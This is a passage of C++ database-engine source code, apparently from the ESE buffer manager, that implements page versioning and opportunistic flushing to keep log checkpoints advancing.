bfil.AbandonLogOps();
}
}
// We attempt to opportunistically version this page if it is required
// to maintain the checkpoint we're in the presence of the waypoint.
//
// Preferred Checkpoint
// ChkPoint "Overscan" ToFlush
// ( ChkPoint | LogRec
// | - Waypoint ) Waypoint | unflushed log buffers
// | | | | |
// | | | | | future log writes ->
// -------------------------|-------------|---------------------|-------------|ooooo| - - - - - - - - - - - -
// | | |
// current current "next"
// lgposOldestBegin0 lgposModify lgposModify
//
// In such a scenario if we don't actually take an update to this BF, then the "next" lgposModify
// never happens ... then checkpoint can be defended correctly, as the log moves on, when
// current lgposOldestBegin0 finally hits the Preferred ChkPoint, the current lgposModify will no
// longer be within the waypoint.
//
// However, if as we take the write latch (and we assume the lgposModify will be set to lgposLogRec
// or thereabouts), then we know already if we let this next lgposModify through we've already
// allowed the Preferred ChkPoint to be offended by considerable margin.
//
// So we version the page before the end of write latching (whether the latch was acquired via
// direct latch or an Read/RDW upgrade path) a page, then the current lgposOldestBegin0 and
// lgposModify, live their life normally on the v1 of the page, get flushed appropriately,
// meanwhile the v2 of the page is free to be hammered upon.
//
BOOL FBFIMaintIsImpedingCheckpointMaintenance( __in const PBF pbf, __out BOOL * const pfUrgentMaintReq )
{
const IFMP ifmp = pbf->ifmp;
INST * pinst = PinstFromIfmp( ifmp );
LOG * plog = pinst->m_plog;
Assert( pbf );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// Unused yet, but we'll need this someday I expect.
Assert( pfUrgentMaintReq );
*pfUrgentMaintReq = fFalse;
*pfUrgentMaintReq = FBFIChance( 40 );
// get the waypoint.
LGPOS lgposWaypoint = g_rgfmp[ ifmp ].LgposWaypoint();
// get the log tip, this is un-thread safe, but for opportunistic purposes only
// if something did go wacky, it would be a VERY rare case and only result in an
// extra version and writing of a page ...
LGPOS lgposLogTip = plog->LgposLGLogTipNoLock();
// if not during recovery and the log tip is beyond the waypoint (i.e. we
// have some LLR depth set) and this is a dirty page
if ( // with or without concurrency simultation
( FBFIChance( 20 ) || ( CmpLgpos( lgposLogTip, lgposWaypoint ) > 0 ) ) &&
//CmpLgpos( lgposLogTip, lgposWaypoint ) > 0 &&
pbf->bfdf > bfdfClean && // OB0 isn't enough by itself, see BFDirty() OB0 reset logic.
CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
__int64 cbEffCheckpointDepth = 0;
// we're a logged page and dirty page ... see if any of the reasons we version are true
//
// Is the page going to impede the checkpoint within a waypoint, and touched
// within the waypoint.
//
ULONG_PTR cbCheckpointDepth = pinst->m_plog->CbLGDesiredCheckpointDepth();
cbEffCheckpointDepth = (__int64) cbCheckpointDepth;
// Now reduce the checkpoint by the waypoint to obtain the effective checkpoint ...
cbEffCheckpointDepth -= (__int64) UlParam( pinst, JET_paramWaypointLatency ) * 1024 * (__int64) UlParam( pinst, JET_paramLogFileSize );
// we can't really let this drop to zero, or we'd version a page on every repeatedly
// update. Using 20%, which was carefully selected after months of careful testing
// and study by an 8-person perf team. (no, not really)
if ( cbEffCheckpointDepth < (__int64) ( cbCheckpointDepth / 5 ) )
{
cbEffCheckpointDepth = cbCheckpointDepth / 5;
}
// This also effectively acts as foreground checkpoint maint, even though it's primary
// purpose is to ensure the waypoint is protected.
const BOOL fWaypoint = g_fBFEnableForegroundCheckpointMaint &&
(LONGLONG) plog->CbLGOffsetLgposForOB0( lgposLogTip, pbf->lgposOldestBegin0 ) > cbEffCheckpointDepth;
//
// Is page marked during checkpoint advancement dependency walking that this page
// is impeding the checkpoint.
//
const BOOL fDependedPage = pbf->bfbitfield.FImpedingCheckpoint();
// concurrency simulation
const BOOL fRandomChance = FBFIChance( 20 );
//
// if this IFMP / PGNO is likely to impede the checkpoint for any of a few ways.
//
if ( fWaypoint || fDependedPage || fRandomChance )
{
// do not version the page if the most recent (but not current) version
// of the page has the same lgposModify as the current version of
// the page. there is simply no point in versioning pages more often
// than once a log file if we are trying to advance the checkpoint
const PBF pbfOlder = pbf->pbfTimeDepChainNext;
if ( NULL == pbfOlder ||
pbf->lgposModify.lGeneration != pbfOlder->lgposModify.lGeneration )
{
return fTrue;
}
}
}
// If we passed all those checks, no foreground maintenance is required.
return fFalse;
}
void BFIMaintImpedingPage( PBF pbf )
{
PBF pbfVer = NULL;
BOOL fUrgentMaintReq = fFalse;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( FBFIMaintIsImpedingCheckpointMaintenance( pbf, &fUrgentMaintReq ) )
{
// Disable cleanup checking
// Opportunistic operation. Doesn't affect main operation.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( ErrBFIVersionPage( pbf, &pbfVer, fUrgentMaintReq ) >= JET_errSuccess )
{
Assert( pbf->pbfTimeDepChainNext != pbfNil );
pbfVer->sxwl.ReleaseWriteLatch();
if ( g_fBFEnableForegroundCheckpointMaint )
{
BFIOpportunisticallyFlushPage( pbfVer, iorpBFCheckpointAdv );
}
}
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
}
// This is being used to maintain a page impeding in some way ...
// 1. it is used to unload a page that for hot pages or checkpoint maintenance requires it
// 2. it is also used to unburden a immutable buffer / i.e. currently under write IO .
//
// The function fails only if maintenance would violate a constraint of the
// engine ... i.e. the later / second case where we could not unburden a
// write IO buffer, and so it is not OK to give out a write-latch to this
// page!
// The first case (for hot/checkpoint) is only optimisic, and a failure to
// version pages there will not fail this API.
ERR ErrBFIMaintImpedingPageLatch( PBF pbf, __in const BOOL fOwnsWrite, BFLatch* pbfl )
{
ERR err = JET_errSuccess;
PBF pbfVer = NULL;
BOOL fUrgentMaintReq = fFalse;
Assert( PBF( pbfl->dwContext ) == pbf );
Assert( fOwnsWrite ?
pbf->sxwl.FOwnWriteLatch() :
pbf->sxwl.FOwnExclusiveLatch() );
// first we attempt to complete the write IO / flush as then we may not have to version
// copy the page
if ( !FBFIUpdatablePage( pbf ) )
{
Assert( wrnBFPageFlushPending == pbf->err );
if ( FBFICompleteFlushPage( pbf, fOwnsWrite ? bfltWrite : bfltExclusive ) )
{
// completed the state transition associated with the write IO ...
Assert( pbf->err < JET_errSuccess || pbf->bfdf == bfdfClean );
Assert( FBFIUpdatablePage( pbf ) );
}
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... but since this function never really returned such
// before (assuming it was validated fully on relatch), we take the
// less risky approach of faking a latch conflict and let the buffer
// return the true error on the relatch path.
if ( pbf->err < JET_errSuccess )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
// cache this info, so we when we unlatch below we know if we were doing this action to
// unburden a Write IO..
const BOOL fInIo = !FBFIUpdatablePage( pbf );
if ( fInIo ||
FBFIMaintIsImpedingCheckpointMaintenance( pbf, &fUrgentMaintReq ) )
{
// If we're trying to unburden an immutable (i.e. undergoing write) page, we must wait for
// a new buffer to be allocated to avoid likely failure ...
fUrgentMaintReq = fUrgentMaintReq || fInIo;
Call( ErrBFIVersionCopyPage( pbf, &pbfVer, fUrgentMaintReq, fOwnsWrite ) );
// We've a newer (pbfVer) version of the page, and pbf is now old
Assert( pbfVer );
if ( pbf->bfdf > bfdfClean )
{
Assert( pbf->pbfTimeDepChainPrev == pbfVer );
Assert( pbfVer->pbfTimeDepChainNext == pbf );
}
// check proper cross pollenation ...
Assert( !FBFICurrentPage( pbf, pbfVer->ifmp, pbfVer->pgno ) );
Assert( FBFICurrentPage( pbfVer, pbf->ifmp, pbf->pgno ) );
if ( fOwnsWrite )
{
pbf->sxwl.ReleaseWriteLatch();
}
else
{
pbf->sxwl.ReleaseExclusiveLatch();
}
if ( g_fBFEnableForegroundCheckpointMaint )
{
// Note: The fInIo case won't really do another Write IO, even if the IO on it
// completed while we were VersionCopy'ing the page. What happens instead is
// ErrBFIFlushPage re-acquires x-latch, sees IO is in the signaled state and
// completes the IO instead of writing again. If it did issue, it would be a
// probably harmless but unnecessary double write, a write of a logically about
// to be made clean page. We'll use a different iorp to detect such a possible
// bug in trace, though we should never see / issue an IO with this iorp.
// Update: Actually it _can_ happen if the previous BF write had an IO error and
// so failed to get the page to clean state ... this code then saw it was in an
// IO ... tried to flush b/c it is still dirty ... BUT we still won't issue the
// actual IO to the FS, because ErrBFIPrepareFlushPage will reject the page for
// flushes of a BF with a negative / failed pbf->err - because write ERRs in ESE,
// at least for the moment, are permanent.
BFIOpportunisticallyFlushPage( pbf, fInIo ? iorpBFImpedingWriteCleanDoubleIo : iorpBFCheckpointAdv );
}
Assert( PBF( pbfl->dwContext ) != pbfVer );
pbfl->dwContext = (DWORD_PTR)pbfVer;
pbfl->pv = pbfVer->pv;
// we are going to claim this as a latch conflict for now ...
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
err = ErrERRCheck( wrnBFLatchMaintConflict );
}
HandleError:
if( err < JET_errSuccess && FBFIUpdatablePage( pbf ) )
{
// This is not a big deal as we did not HAVE to version unload this buffer ...
err = JET_errSuccess;
}
// validate out expectations
if ( JET_errSuccess == err || err < JET_errSuccess )
{
// Verify we did nothing ...
Assert( JET_errSuccess == err || JET_errOutOfMemory == err || JET_errOutOfBuffers == err );
Assert( pbf == PBF( pbfl->dwContext ) );
Assert( fOwnsWrite ?
pbf->sxwl.FOwnWriteLatch() :
pbf->sxwl.FOwnExclusiveLatch() );
}
else
{
Assert( wrnBFLatchMaintConflict == err );
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
Assert( pbfVer->sxwl.FOwnWriteLatch() );
}
return err;
}
// Returns true if this buffer / page needs opportunistic flushing due to
// falling behind or checkpoint hot page contention
BOOL FBFIMaintNeedsOpportunisticFlushing( PBF pbf )
{
const IFMP ifmp = pbf->ifmp;
INST * pinst = PinstFromIfmp( ifmp );
LOG * plog = pinst->m_plog;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
const ULONG_PTR cbCheckpointDepthPreferred = pinst->m_plog->CbLGDesiredCheckpointDepth();
if ( pinst->m_fCheckpointQuiesce )
{
// We will let the checkpoint thread handle the quiesce case
return fFalse;
}
if ( pbf->bfdf > bfdfClean && // just OB0 is not enough, see BFDirty OB0 reset comment
CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
// we're a logged page ... see if any of the reasons we version are true
//
// Is the page hot / latch contended and impeding the checkpoint.
//
const BOOL fHotPage = plog->CbLGOffsetLgposForOB0( plog->LgposLGLogTipNoLock(), pbf->lgposOldestBegin0 ) > cbCheckpointDepthPreferred &&
( pbf->sxwl.CWaitExclusiveLatch() || pbf->sxwl.CWaitWriteLatch() ) ;
//
// opportune foreground checkpoint maint ...
//
// A subtle trick is accomplished by this ... as soon as a page moves beyond
// the checkpoint the next time it is write|excl unlatched/downgraded we will
// then opportunistically version (and probably flush, though the callers are
// doing the flushing here) the page ... this moves IO onto foreground worker
// threads, and probably smooths out the IO as well.
// If we set this difference even lower than JET_paramCheckpointDepthMax we
// would move even more IO to the foreground ... though only for repeatedly
// touched or hot-ish excl latched pages ...
const BOOL fForegroundCheckpointMaint = g_fBFEnableForegroundCheckpointMaint &&
plog->CbLGOffsetLgposForOB0( plog->LgposLGLogTipNoLock(), pbf->lgposOldestBegin0 ) > cbCheckpointDepthPreferred;
// to disable opportune foreground checkpoint advancement ...
//const BOOL fForegroundCheckpointAdvancement = fFalse;
// concurrency simulation
const BOOL fRandomChance = FBFIChance( 10 );
//
// if this IFMP / PGNO is impeding the checkpoint ...
//
// NOTE: there is no need to version the page if is already
// versioned ( pbf->pbfTimeDepChainNext != pbfNil ).
if ( pbf->pbfTimeDepChainNext == pbfNil &&
( fHotPage || fForegroundCheckpointMaint || fRandomChance ) )
{
return fTrue;
}
}
return fFalse;
}
// This performs foreground checkpoint maintenance in a way that is compatible
// with an burdened buffer
void BFIOpportunisticallyVersionPage( PBF pbf, PBF * ppbfOpportunisticCheckpointAdv )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( ppbfOpportunisticCheckpointAdv );
*ppbfOpportunisticCheckpointAdv = NULL;
if ( FBFIMaintNeedsOpportunisticFlushing( pbf ) )
{
if ( ErrBFIVersionPage( pbf, ppbfOpportunisticCheckpointAdv, fFalse ) >= JET_errSuccess )
{
Assert( pbf->pbfTimeDepChainNext != pbfNil );
(*ppbfOpportunisticCheckpointAdv)->sxwl.ReleaseWriteLatch();
}
}
}
// This performs foreground checkpoint maintenance in a way that is compatible
// with an un-burdened buffer
void BFIOpportunisticallyVersionCopyPage( PBF pbf, PBF * ppbfNew, __in const BOOL fOwnsWrite )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->bfdf >= bfdfClean );
Assert( ppbfNew );
*ppbfNew = NULL;
// Disable cleanup checking
// Opportunistical operation. Doesn't affect main operation.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( FBFIMaintNeedsOpportunisticFlushing( pbf ) )
{
if ( ErrBFIVersionCopyPage( pbf, ppbfNew, fFalse, fOwnsWrite ) >= JET_errSuccess )
{
Assert( (*ppbfNew)->pbfTimeDepChainNext != pbfNil );
Assert( (*ppbfNew)->pbfTimeDepChainNext == pbf );
Assert( pbf->pbfTimeDepChainPrev == (*ppbfNew) );
}
}
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
ERR ErrBFIVersionPage( PBF pbf, PBF* ppbfOld, const BOOL fWait )
{
ERR err = JET_errSuccess;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
TraceContextScope tcVerPage;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( !!pbf->fCurrentVersion == !pbf->fOlderVersion );
Assert( FBFIUpdatablePage( pbf ) ); // we are in trouble if we're undergoing IO ...
if ( pbf->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
Assert( ( pbf->err >= JET_errSuccess ) || ( pbf->bfdf > bfdfClean ) );
// Note: we use icbPage not icbBuffer because we know this buffer will be written out (hopefully soon)
const ICBPage icbNewOrigBuffer = (ICBPage)pbf->icbBuffer;
// Because the buffer is dirty, we expect it to be fully hydrated.
Expected( pbf->icbBuffer == pbf->icbPage );
// allocate a new BF to contain the OLD version of the given BF
Call( ErrBFIAllocPage( ppbfOld, icbNewOrigBuffer, fWait ) );
Assert( (*ppbfOld)->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( *ppbfOld );
// if we are mapping views then alloc a page of memory to hold the page image
if ( BoolParam( JET_paramEnableViewCache ) )
{
const size_t cbAlloc = g_rgcbPageSize[icbNewOrigBuffer];
if ( !( (*ppbfOld)->pv = PvOSMemoryPageAlloc( cbAlloc, NULL ) ) )
{
// release our allocated BF
BFIFreePage( *ppbfOld );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
(*ppbfOld)->bfat = bfatPageAlloc;
}
Assert( FBFIValidPvAllocType( (*ppbfOld) ) );
Assert( (*ppbfOld)->bfat != bfatNone );
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != pbf->ifmp );
(*ppbfOld)->ifmp = pbf->ifmp;
(*ppbfOld)->pgno = pbf->pgno;
(*ppbfOld)->fAbandoned = pbf->fAbandoned; // just in case (we're already rejecting abandoned pages above).
(*ppbfOld)->icbPage = pbf->icbPage;
(*ppbfOld)->tce = pbf->tce;
PERFOpt( cBFCache.Inc( PinstFromIfmp( (*ppbfOld)->ifmp ), (*ppbfOld)->tce, (*ppbfOld)->ifmp ) );
Assert( icbPageInvalid != (*ppbfOld)->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[(*ppbfOld)->icbBuffer] );
Assert( g_rgcbfCachePages[(*ppbfOld)->icbBuffer] > 0 );
// insert this IFMP / PGNO in the LRUK. do not use history and set priority to min so that the
// old BF will be evicted ASAP
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( pbf->ifmp, pbf->pgno ),
*ppbfOld,
TickOSTimeCurrent(),
g_pctCachePriorityMin,
fFalse );
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// release our temp memory if any
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( (*ppbfOld)->bfat == bfatPageAlloc ); // we JUST set this above?
OSMemoryPageFree( (*ppbfOld)->pv );
(*ppbfOld)->pv = NULL;
(*ppbfOld)->bfat = bfatNone;
}
// release our allocated BF
BFIFreePage( *ppbfOld );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// we are past the point of no failure
Assert( icbNewOrigBuffer == pbf->icbBuffer );
Assert( pbf->icbBuffer == (*ppbfOld)->icbBuffer );
UtilMemCpy( (*ppbfOld)->pv, pbf->pv, g_rgcbPageSize[icbNewOrigBuffer] );
// copy the error state
(*ppbfOld)->err = pbf->err;
// mark both BFs as dirty. if the given BF is filthy, move the filthy state
// to the old BF
BFIDirtyPage( pbf, bfdfDirty, *tcVerPage ); // Tracing context on the BF will be copied to the versioned BF
BFIDirtyPage( *ppbfOld, BFDirtyFlags( pbf->bfdf ), *tcVerPage );
Expected( bfdfDirty <= pbf->bfdf );
pbf->bfdf = bfdfDirty;
// move the lgpos information to the old BF because it is tied with the
// flush of the relevant data
BFISetLgposOldestBegin0( *ppbfOld, pbf->lgposOldestBegin0, *tcVerPage );
BFIResetLgposOldestBegin0( pbf );
g_critBFDepend.Enter();
// add ourself as a time dependency to the given BF
(*ppbfOld)->pbfTimeDepChainNext = pbf->pbfTimeDepChainNext;
(*ppbfOld)->pbfTimeDepChainPrev = pbf;
pbf->pbfTimeDepChainNext = *ppbfOld;
if ( (*ppbfOld)->pbfTimeDepChainNext != pbfNil )
{
(*ppbfOld)->pbfTimeDepChainNext->pbfTimeDepChainPrev = *ppbfOld;
}
(*ppbfOld)->fOlderVersion = fTrue;
// if the given BF cannot be flushed because a dependency was purged then
// we cannot allow the old BF to be flushable either
if ( pbf->bfbitfield.FDependentPurged() )
{
(*ppbfOld)->bfbitfield.SetFDependentPurged( fTrue );
}
// The newer version of the page isn't impeding the checkpoint, only the older one ...
(*ppbfOld)->bfbitfield.SetFImpedingCheckpoint( pbf->bfbitfield.FImpedingCheckpoint() );
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
g_critBFDepend.Leave();
if ( pbf->prceUndoInfoNext == prceNil )
{
// Simple case, no RCEs to transfer. Just move lgposModify.
BFISetLgposModify( *ppbfOld, pbf->lgposModify );
BFIResetLgposModify( pbf );
}
else
{
// Move our undo info to the old BF because its removal is tied with the
// flush of the relevant data.
//
// NOTE: this must be done after linking in the versioned page so that it
// is always possible to reach an RCE containing undo info from the hash
// table.
// These are hashed critical sections, but we establish an order to avoid deadlocks.
CCriticalSection* const pcrit = &g_critpoolBFDUI.Crit( pbf );
CCriticalSection* const pcritOld = &g_critpoolBFDUI.Crit( *ppbfOld );
CCriticalSection* const pcritMax = max( pcrit, pcritOld );
CCriticalSection* const pcritMin = min( pcrit, pcritOld );
ENTERCRITICALSECTION ecsMax( pcritMax );
ENTERCRITICALSECTION ecsMin( pcritMin, pcritMin != pcritMax );
(*ppbfOld)->prceUndoInfoNext = pbf->prceUndoInfoNext;
pbf->prceUndoInfoNext = prceNil;
// We are adjusting lgposModify under the DUI lock because BFRemoveUndoInfo
// does not take page latches, so we need to make sure there is consistency
// between this code path and removing undo info.
BFISetLgposModify( *ppbfOld, pbf->lgposModify );
BFIResetLgposModify( pbf );
}
(*ppbfOld)->rbsposSnapshot = pbf->rbsposSnapshot;
pbf->rbsposSnapshot = rbsposMin;
// keep versioned page stats
PERFOpt( cBFPagesVersioned.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cBFVersioned ) );
ETCacheVersionPage( pbf->ifmp, pbf->pgno );
// update our page write stats
//
// NOTE: page versioning is a "virtual" flush
if ( !pbf->fFlushed )
{
pbf->fFlushed = fTrue;
}
else
{
(*ppbfOld)->fFlushed = fTrue;
}
return JET_errSuccess;
HandleError:
Assert( err < JET_errSuccess ); // no warnings.
*ppbfOld = pbfNil;
return err;
}
// "Inverted" Version Page
// This takes a pbf that will be the "older" version of the page, and creates a
// newer version of the page in a new buffer.
//
ERR ErrBFIVersionCopyPage( PBF pbfOrigOld, PBF* ppbfNewCurr, const BOOL fWait, __in const BOOL fOwnsWrite )
{
ERR err = JET_errSuccess;
BFLRUK::CLock lockLRUK;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
BFHash::CLock lockHash;
PGNOPBF pgnopbf;
Assert( pbfOrigOld->sxwl.FOwnExclusiveLatch() || pbfOrigOld->sxwl.FOwnWriteLatch() );
Assert( pbfOrigOld->fCurrentVersion );
Assert( !pbfOrigOld->fOlderVersion );
Assert( fOwnsWrite ? pbfOrigOld->sxwl.FOwnWriteLatch() : pbfOrigOld->sxwl.FNotOwnWriteLatch() );
if ( !fOwnsWrite )
{
CSXWLatch::ERR errWL = pbfOrigOld->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errWL != CSXWLatch::ERR::errSuccess )
{
Assert( CSXWLatch::ERR::errWaitForWriteLatch == errWL );
pbfOrigOld->sxwl.WaitForWriteLatch();
}
}
Assert( pbfOrigOld->sxwl.FOwnWriteLatch() );
if ( pbfOrigOld->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
Assert( ( pbfOrigOld->err >= JET_errSuccess ) || ( pbfOrigOld->bfdf > bfdfClean ) );
// allocate a new BF to contain the NEW version of the given BF
// Note: We use the current buffer size, but when we version we could consider compressing since we have
// to move it anyway.
const ICBPage icbNewCurrBuffer = (ICBPage)pbfOrigOld->icbBuffer;
Call( ErrBFIAllocPage( ppbfNewCurr, icbNewCurrBuffer, fWait ) );
Assert( (*ppbfNewCurr)->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( *ppbfNewCurr );
// if we are mapping views then alloc a page of memory to hold the page image
if ( BoolParam( JET_paramEnableViewCache ) )
{
const size_t cbAlloc = g_rgcbPageSize[icbNewCurrBuffer];
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( !( (*ppbfNewCurr)->pv = PvOSMemoryPageAlloc( cbAlloc, NULL ) ) )
{
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
// release our allocated BF
BFIFreePage( *ppbfNewCurr );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
(*ppbfNewCurr)->bfat = bfatPageAlloc;
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
Assert( FBFIValidPvAllocType( (*ppbfNewCurr) ) );
Assert( (*ppbfNewCurr)->bfat != bfatNone );
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != pbfOrigOld->ifmp );
(*ppbfNewCurr)->ifmp = pbfOrigOld->ifmp;
(*ppbfNewCurr)->pgno = pbfOrigOld->pgno;
(*ppbfNewCurr)->fAbandoned = pbfOrigOld->fAbandoned; // just in case (we're already rejecting abandoned paged above).
(*ppbfNewCurr)->icbPage = pbfOrigOld->icbPage;
(*ppbfNewCurr)->tce = pbfOrigOld->tce;
PERFOpt( cBFCache.Inc( PinstFromIfmp( (*ppbfNewCurr)->ifmp ), (*ppbfNewCurr)->tce, (*ppbfNewCurr)->ifmp ) );
Assert( icbPageInvalid != (*ppbfNewCurr)->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[(*ppbfNewCurr)->icbBuffer] );
Assert( g_rgcbfCachePages[(*ppbfNewCurr)->icbBuffer] > 0 );
// insert this IFMP / PGNO in the LRUK. use the original BF as history so
// that the new BF is treated like the original BF would have been.
BFISynchronicity();
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( pbfOrigOld->ifmp, pbfOrigOld->pgno ),
*ppbfNewCurr,
TickOSTimeCurrent(),
g_pctCachePriorityNeutral, // priority is not relevant because the priority in pbfOrigOld will override this value
fFalse,
NULL,
pbfOrigOld );
BFISynchronicity();
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// release our temp memory if any
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( (*ppbfNewCurr)->bfat == bfatPageAlloc ); // we JUST set this above?
OSMemoryPageFree( (*ppbfNewCurr)->pv );
(*ppbfNewCurr)->pv = NULL;
(*ppbfNewCurr)->bfat = bfatNone;
}
// release our allocated BF
BFIFreePage( *ppbfNewCurr );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// past point of failure
// write lock this IFMP / PGNO in the hash table to prevent new
// latch attempts on this BF
BFISynchronicity();
g_bfhash.WriteLockKey( IFMPPGNO( pbfOrigOld->ifmp, pbfOrigOld->pgno ), &lockHash );
BFISynchronicity();
//
// Have a new page, w-latch, and g_bfhash table latch ... we can do ANYTHING now ...
//
pgnopbf.pgno = pbfOrigOld->pgno;
pgnopbf.pbf = *ppbfNewCurr;
const BFHash::ERR errHash = g_bfhash.ErrReplaceEntry( &lockHash, pgnopbf );
Assert( BFHash::ERR::errSuccess == errHash );
// save the current BF image
UtilMemCpy( (*ppbfNewCurr)->pv, pbfOrigOld->pv, g_rgcbPageSize[icbNewCurrBuffer] );
// copy the error state
// when it is page flush pending, we'll NOT want to do this ... as the newer version is not in a flush op ...
if ( wrnBFPageFlushPending != pbfOrigOld->err )
{
(*ppbfNewCurr)->err = pbfOrigOld->err;
}
// mark both BFs as dirty. if the given BF is filthy, move the filthy state
// to the old BF
if ( pbfOrigOld->bfdf != bfdfClean )
{
BFIDirtyPage( *ppbfNewCurr, bfdfDirty, *TraceContextScope() ); // Tracing context on the BF will be copied to the versioned BF
BFIDirtyPage( pbfOrigOld, BFDirtyFlags( (*ppbfNewCurr)->bfdf ), *TraceContextScope() ); // just in case
}
else
{
Assert( (*ppbfNewCurr)->bfdf == bfdfClean );
}
BFISynchronicity();
g_critBFDepend.Enter();
BFISynchronicity();
// add ourself as a time dependency to the given BF
(*ppbfNewCurr)->pbfTimeDepChainNext = pbfOrigOld;
(*ppbfNewCurr)->pbfTimeDepChainPrev = pbfNil; // should already be NULL.
pbfOrigOld->pbfTimeDepChainPrev = *ppbfNewCurr;
// update the older/current version info
pbfOrigOld->fOlderVersion = fTrue;
pbfOrigOld->fCurrentVersion = fFalse;
(*ppbfNewCurr)->fOlderVersion = fFalse;
(*ppbfNewCurr)->fCurrentVersion = fTrue;
// if the given BF cannot be flushed because a dependency was purged then
// we cannot allow the new BF to be flushable either
// Well technically SOMEONE points out because the older version is already
// pinned in this case, it will pin the current version or any subsequent
// versions. Of course, this could be icky because it would allow you to
// start updating the page again ... so for now, leave it FDependentPurged.
if ( pbfOrigOld->bfbitfield.FDependentPurged() )
{
(*ppbfNewCurr)->bfbitfield.SetFDependentPurged( fTrue );
}
// The newer version of the page isn't impeding the checkpoint, only the older one ...
Assert( (*ppbfNewCurr)->bfbitfield.FImpedingCheckpoint() == fFalse );
(*ppbfNewCurr)->bfbitfield.SetFImpedingCheckpoint( fFalse );
BFISynchronicity();
g_critBFDepend.Leave();
BFISynchronicity();
// leave our undo info on the old BF because its removal is tied with the
// flush of the relevant data
//
if ( pbfOrigOld->bfdf == bfdfClean )
{
Assert( pbfOrigOld->prceUndoInfoNext == prceNil );
}
Assert( (*ppbfNewCurr)->prceUndoInfoNext == prceNil );
(*ppbfNewCurr)->prceUndoInfoNext = prceNil; // just in case...
// Note: we do not unlock above because then we'll be letting in BFRemoveUndoInfo in earlier... we
// must let this go no sooner than the version chain is setup.
BFISynchronicity();
g_bfhash.WriteUnlockKey( &lockHash );
BFISynchronicity();
// now that we're outside the g_bfhash lookup table (keep in mind we still have
// the w-latch on the newest / current version of the page), we can update
// our lgpos OB0 information ...
// handle lgpos information because it is tied with the flush of the relevant data
// Do not need to BFISetLgposOldestBegin0() as the old buffer already has it, and the
// new buffer should already be reset, we just allocated it.
Assert( 0 == CmpLgpos( &((*ppbfNewCurr)->lgposOldestBegin0), &lgposMax ) );
BFIResetLgposOldestBegin0( *ppbfNewCurr ); // just in case
if ( pbfOrigOld->bfdf == bfdfClean )
{
// Similar logic in BFDirty() ... move this out of the OB0, so this older clean
// version is completely invsible to our processes. Probably this isn't a requirement.
BFIResetLgposOldestBegin0( pbfOrigOld );
}
// Do not need BFISetLgposModify() as the old buffer already has it.
Assert( 0 == CmpLgpos( &((*ppbfNewCurr)->lgposModify), &lgposMin ) );
BFIResetLgposModify( *ppbfNewCurr ); // just in case
if ( pbfOrigOld->bfdf == bfdfClean )
{
Assert( 0 == CmpLgpos( &(pbfOrigOld->lgposModify), &lgposMin ) );
}
(*ppbfNewCurr)->rbsposSnapshot = rbsposMin; // just in case
// update our page write stats
//
// NOTE: page versioning is a "virtual" flush
if ( !pbfOrigOld->fFlushed )
{
pbfOrigOld->fFlushed = fTrue;
}
else
{
(*ppbfNewCurr)->fFlushed = fTrue;
}
// lighten up on latch if appropriate
Assert( pbfOrigOld->sxwl.FOwnWriteLatch() );
if ( !fOwnsWrite )
{
pbfOrigOld->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
Assert( pbfOrigOld->sxwl.FOwnExclusiveLatch() || pbfOrigOld->sxwl.FOwnWriteLatch() );
Assert( (*ppbfNewCurr)->sxwl.FOwnWriteLatch() );
// keep versioned page stats
